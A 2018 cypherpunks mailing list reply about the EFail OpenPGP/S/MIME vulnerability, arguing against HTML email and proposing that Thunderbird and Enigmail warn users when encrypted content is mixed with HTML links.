EFail - OpenPGP S/MIME Vulnerability

Shawn K. Quinn skquinn at rushpost.com
Wed May 16 17:27:33 PDT 2018

On 05/15/2018 12:05 AM, Marina Brown wrote:
> Remember the campaign against HTML email ? I do.
> We were right.

The campaign is still ongoing. Maybe we have lost in the case of the
vast majority of marketing/advertising lists, but Thunderbird and other
email clients (thankfully) offer the option to not automatically load
external links by default.

I do think a future version (actually, the next version) of Thunderbird
and/or Enigmail need to put up a big huge "danger" warning when they
detect HTML email mixed with encrypted content, especially when it looks
like someone has tried to put an encrypted blob as the destination of a
link (which as I understand it, is how this exploit works). There's no
good reason to do this, and plenty of bad reasons.

Shawn K. Quinn <skquinn at rushpost.com>

More information about the cypherpunks mailing list